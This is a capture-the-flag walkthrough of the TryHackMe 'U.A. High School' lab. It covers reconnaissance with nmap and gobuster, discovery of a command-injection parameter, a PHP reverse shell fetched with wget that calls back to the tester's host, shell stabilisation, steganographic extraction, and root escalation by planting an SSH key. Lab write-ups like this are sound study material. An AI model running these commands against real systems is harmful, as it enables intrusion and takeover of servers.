[Linux] U.A.HighSchool
This page aims to provide a clear and comprehensive write-up for the U.A. High School room on TryHackMe. I used Kali Linux to conduct the penetration test.
Reconnaissance
Let's start by running a basic Nmap scan without any options to make it run quickly.
sudo nmap 10.10.242.225PORT STATE SERVICE
22/tcp open ssh
80/tcp open httpBy default, Nmap scans only the first 1000 ports. An extensive scan on ports 1001 to 65535 does not show any open ports; some are filtered, which means that Nmap cannot determine if the port is open or closed. Let's continue with these two ports.
It is recommended to perform a more precise analysis on the discovered ports. In our case, this does not reveal anything interesting for the rest of the journey. Below, I have listed some interesting Nmap commands for reconnaissance.
sudo nmap -sC -sV -p 22,80 10.10.242.225
sudo nmap -A -p 22,80 10.10.242.225
sudo nmap --script vuln -p 22,80 10.10.242.225Enumeration
HTTP
Based on experience, it is easier to start enumeration with the web application. So, let's see what information we can gather on port 80.
In web application testing, it’s more than necessary to perform a deep and thorough directory listing to find pages and their subpages. REALLY!!!
To start, we can use the wordlist located at /usr/share/wordlists/dirb/common.txt.
gobuster dir -u http://10.10.26.54 -w /usr/share/wordlists/dirb/common.txt===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 276]
/.htpasswd (Status: 403) [Size: 276]
/.htaccess (Status: 403) [Size: 276]
/assets (Status: 301) [Size: 311] [--> http://10.10.26.54/assets/]
/index.html (Status: 200) [Size: 1988]
/server-status (Status: 403) [Size: 276]We have found a subdirectory called assets, which we can enumerate in the same way
gobuster dir -u http://10.10.26.54/assets -w /usr/share/wordlists/dirb/common.txt===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 276]
/.htaccess (Status: 403) [Size: 276]
/.htpasswd (Status: 403) [Size: 276]
/images (Status: 301) [Size: 318] [--> http://10.10.26.54/assets/images/]
/index.php (Status: 200) [Size: 0]Nothing interesting was found with other wordlists. Using Burp Suite, we can obtain the sitemap:
There is nothing special or interesting on the pages about.html, admissions.html, contact.html, courses.html, or index.html. We cannot access the /assets/images page or folder, so we'll focus on /assets/index.php.
When a web application is configured correctly, we cannot see the content of a PHP file on the client side. PHP is interpreted on the server side, and the result is sent to the client. The index.php file can be used to pass parameters to the backend by using POST or GET requests. These parameters often hide relevant information when pentesting a web application. Since the content of the PHP file is not visible, the parameters we look for are hidden.
arjun can be used to find hidden parameters, but it did not work in this case, so I tried dirsearch.
arjun -u http://10.10.26.54/assets/index.php[*] Probing the target for stability
[*] Analysing HTTP response for anomalies
[*] Analysing HTTP response for potential parameter names
[*] Logicforcing the URL endpoint
[!] No parameters were discovered.dirsearch seems to work.
dirsearch -u http://10.10.26.54/assets/index.php[13:23:41] Starting: assets/index.php/
[13:23:44] 404 - 273B - /assets/index.php/%2e%2e//google.com
[13:24:14] 200 - 56B - /assets/index.php/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=dir
We found the parameter cmd where we can inject Linux commands.
The output appears to be encoded in base64. Let's use our own terminal to proceed.
We can exploit that vulnerability to get a reverse shell.
Exploitation
I will upload a file to the target to obtain a reverse shell.
On my machine: Create a file named rshell containing the following code:
php -r '$sock=fsockopen("10.9.223.245",4242);exec("/bin/sh -i <&3 >&3 2>&3");'Start a web server on the local machine:
python3 -m http.server
Open another terminal and type the following command to upload the php reverse shell.
curl http://10.10.26.54/assets/index.php?cmd="wget%2010.9.223.245:8000/rshell" | base64 -d
Yes, it worked!
Now we should start a listener on the local machine and then run the PHP file on the remote host.
curl http://10.10.26.54/assets/index.php?cmd="sh%20rshell" | base64 -d #attacker: Terminal 1
nc -nlvp 4242 # attacker: Terminal 2 
We got our reverse shell.
Let's make it stable.
# On reverse shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z
# On local machine terminal
stty raw -echo; fg
Enumeration
We can explore our new system.
alias ls="ls -al --color"
The content of /assets/images is interesting. We can download it to our local machine for deeper analysis. So, let's start a web server on the reverse shell to download those files.
We continue our exploration and find interesting content in a directory called Hidden_Content.
Passphrase: AllmightForEver!!!
We can see the user flag but we do not have read permission.
User: deku
Let's see what we can find on the images.
We are not able to see the content of the other image:
The file extension (jpg) does not correspond to the magic number (png).
When we change the file extension to (.png) we still can not see the content of the image. So we change the magic number.
For jpg it is FF D8 FF E0 00 10 4A 46 49 46 00 01.
hexeditor oneforall.jpg
We can use Stegseek and the passphrase we found to try extracting some information.
Seems like we got deku password.
Escalation
sudo -l
After a long period of reflection, we decided to exploit the eval function and redirect the echo output somewhere. It is possible to add our ssh public key in root user's authorized_keys.
SSH
Remediation
Last updated